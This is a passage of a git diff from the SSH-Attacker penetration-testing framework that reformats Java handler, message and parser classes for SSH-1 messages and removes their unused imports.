LOGGER.warn( - "Recieved a Command : {}", - message.getCommand().getValue()); - //sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved a Command : {}", message.getCommand().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java index a88aae1e9..04e50b9fe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitConfirmationMessageSSHV1Handler.java @@ -9,12 +9,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ExitConfirmationMessageSSHV1Handler extends SshMessageHandler { +public class ExitConfirmationMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java index 41b2229f0..890c28cd0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExitStatusMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,12 +21,8 @@ public ExitStatusMessageSSHV1Handler(SshContext context) { super(context); } - - @Override public void adjustContext(ExitStatusMessageSSH1 message) { - LOGGER.warn( - "Recieved Exit Status {}", - message.getExitStatus().getValue()); + LOGGER.warn("Recieved Exit Status {}", message.getExitStatus().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java index cb429f1a9..feb9766b9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/IgnoreMessageSSHV1Handler.java @@ -21,12 +21,9 @@ public IgnoreMessageSSHV1Handler(SshContext context) { super(context); } - @Override public void adjustContext(IgnoreMessageSSH1 message) { - LOGGER.warn( - "Recieved a Ignore Message, Reason: {}", - message.getIgnoreMessage().getValue()); - //sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved a Ignore Message, Reason: {}", message.getIgnoreMessage().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java index f8975d378..37ae73a6b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java @@ -1,4 +1,3 @@ - /* * SSH-Attacker - A Modular Penetration Testing Framework for SSH * @@ -11,7 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -30,9 +28,7 @@ public StderrDataMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(StderrDataMessageSSH1 message) { - LOGGER.warn( - "Recieved Stderr Data: {}", - message.getData().getValue()); - //sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved Stderr Data: {}", message.getData().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java index 79deaa050..018759697 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -29,9 +28,7 @@ public StdinDataMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(StdinDataMessageSSH1 message) { - LOGGER.warn( - "Recieved Stdin Data: {}", - message.getData().getValue()); - //sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved Stdin Data: {}", message.getData().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java index afc4d078a..4c70197c8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -29,9 +28,7 @@ public StdoutDataMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(StdoutDataMessageSSH1 message) { - LOGGER.warn( - "Recieved Stdout Data: {}", - message.getData().getValue()); - //sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved Stdout Data: {}", message.getData().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java index 885eaf786..57aaa7cb5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java @@ -18,7 +18,6 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; - import java.io.InputStream; public class DebugMessageSSH1 extends SshMessage { @@ -34,8 +33,7 @@ public void setDebugMessage(ModifiableString disconnectReason) { } public void setDebugMessage(String disconnectReason) { - debugMessage = - ModifiableVariableFactory.safelySetValue(debugMessage, disconnectReason); + debugMessage = ModifiableVariableFactory.safelySetValue(debugMessage, disconnectReason); } @Override @@ -44,8 +42,7 @@ public DebugMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser( - SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new DebugMessageSSHv1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java index 330e3df21..2be56745b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java @@ -13,14 +13,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; - import java.io.InputStream; public class EofMessageSSH1 extends SshMessage { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java index a6dbd85b8..4c4483c0f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java @@ -14,15 +14,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DebugMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExecCmdMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExecCmdMessageSSHv1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExecCmdMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExecCmdMessageSSHV1Serializier; - import java.io.InputStream; public class ExecCmdMessageSSH1 extends SshMessage { @@ -38,8 +33,7 @@ public void setCommand(ModifiableString disconnectReason) { } public void setCommand(String disconnectReason) { - command = - ModifiableVariableFactory.safelySetValue(command, disconnectReason); + command = ModifiableVariableFactory.safelySetValue(command, disconnectReason); } @Override @@ -48,8 +42,7 @@ public ExecCmdMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser( - SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new ExecCmdMessageSSHv1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java index 1d8ffc1fa..8df49bbcd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java @@ -13,14 +13,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExecShellMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExecShellMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExecShellMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExecShellMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; - import java.io.InputStream; public class ExecShellMessageSSH1 extends SshMessage { @@ -31,7 +26,8 @@ public ExecShellMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new ExecShellMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java index 612006b21..de102724d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java @@ -12,15 +12,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitConfirmationMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitConfirmationMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitConfirmationMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitConfirmationMessageSSHV1Serializier; - import java.io.InputStream; public class ExitConfirmationMessageSSH1 extends SshMessage { @@ -31,7 +26,8 @@ public ExitConfirmationMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new ExitConfirmationMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java index 5986904c8..bc1cedeae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java @@ -9,21 +9,15 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitConfirmationMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitStatusMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitConfirmationMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitStatusMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitConfirmationMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitConfirmationMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; - import java.io.InputStream; public class ExitStatusMessageSSH1 extends SshMessage { @@ -39,8 +33,7 @@ public void setExitStatus(ModifiableInteger exitStatus) { } public void setExitStatus(int exitStatus) { - this.exitStatus = - ModifiableVariableFactory.safelySetValue(this.exitStatus, exitStatus); + this.exitStatus = ModifiableVariableFactory.safelySetValue(this.exitStatus, exitStatus); } @Override @@ -49,7 +42,8 @@ public ExitStatusMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new ExitStatusMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java index a2abc1d70..95ca830e5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java @@ -18,8 +18,6 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.parser.IgnoreMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.IgnoreMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.IgnoreMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.IgnoreMessageSerializer; - import java.io.InputStream; public class IgnoreMessageSSH1 extends SshMessage { @@ -35,8 +33,7 @@ public void setIgnoreReason(ModifiableString disconnectReason) { } public void setIgnoreReason(String disconnectReason) { - ignoreMessage = - ModifiableVariableFactory.safelySetValue(ignoreMessage, disconnectReason); + ignoreMessage = ModifiableVariableFactory.safelySetValue(ignoreMessage, disconnectReason); } @Override @@ -45,8 +42,7 @@ public IgnoreMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser( - SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new IgnoreMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java index b22b53dce..07f14bf6f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java @@ -15,14 +15,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StderrDataMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdoutDataMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StderrDataMessageSSHv1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdoutDataMessageSSHv1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StderrDataMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdoutDataMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StderrDataMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdoutDataMessageSSHV1Serializier; - import java.io.InputStream; public class StderrDataMessageSSH1 extends SshMessage { @@ -38,8 +33,7 @@ public void setData(ModifiableString disconnectReason) { } public void setData(String disconnectReason) { - data = - ModifiableVariableFactory.safelySetValue(data, disconnectReason); + data = ModifiableVariableFactory.safelySetValue(data, disconnectReason); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java index 833e4b839..0a85249ad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java @@ -14,15 +14,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DebugMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdinDataMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdinDataMessageSSHv1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdinDataMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdinDataMessageSSHV1Serializier; - import java.io.InputStream; public class StdinDataMessageSSH1 extends SshMessage { @@ -38,8 +33,7 @@ public void setData(ModifiableString disconnectReason) { } public void setData(String disconnectReason) { - data = - ModifiableVariableFactory.safelySetValue(data, disconnectReason); + data = ModifiableVariableFactory.safelySetValue(data, disconnectReason); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java index a2e6c5b91..093c44746 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java @@ -14,15 +14,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdinDataMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdoutDataMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdinDataMessageSSHv1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdoutDataMessageSSHv1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdinDataMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdoutDataMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdinDataMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdoutDataMessageSSHV1Serializier; - import java.io.InputStream; public class StdoutDataMessageSSH1 extends SshMessage { @@ -38,8 +33,7 @@ public void setData(ModifiableString disconnectReason) { } public void setData(String disconnectReason) { - data = - ModifiableVariableFactory.safelySetValue(data, disconnectReason); + data = ModifiableVariableFactory.safelySetValue(data, disconnectReason); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java index 63c9cfef7..8de018cbe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DebugMessageSSHv1Parser.java @@ -10,13 +10,13 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class DebugMessageSSHv1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public DebugMessageSSHv1Parser(SshContext context, InputStream stream) { super(stream); } @@ -30,7 +30,6 @@ private void parseDebugMessage(DebugMessageSSH1 message) { @Override protected void parseMessageSpecificContents(DebugMessageSSH1 message) { parseDebugMessage(message); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java index b059f5e56..00a028b67 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/EofMessageSSHV1Parser.java @@ -10,12 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class EofMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java index ada751c35..3e6cf4cc2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecCmdMessageSSHv1Parser.java @@ -9,15 +9,14 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class ExecCmdMessageSSHv1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public ExecCmdMessageSSHv1Parser(SshContext context, InputStream stream) { super(stream); } @@ -31,7 +30,6 @@ private void parseIgnoreReason(ExecCmdMessageSSH1 message) { @Override protected void parseMessageSpecificContents(ExecCmdMessageSSH1 message) { parseIgnoreReason(message); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java index 1be092352..5cb6b76f6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExecShellMessageSSHV1Parser.java @@ -10,12 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecShellMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class ExecShellMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git 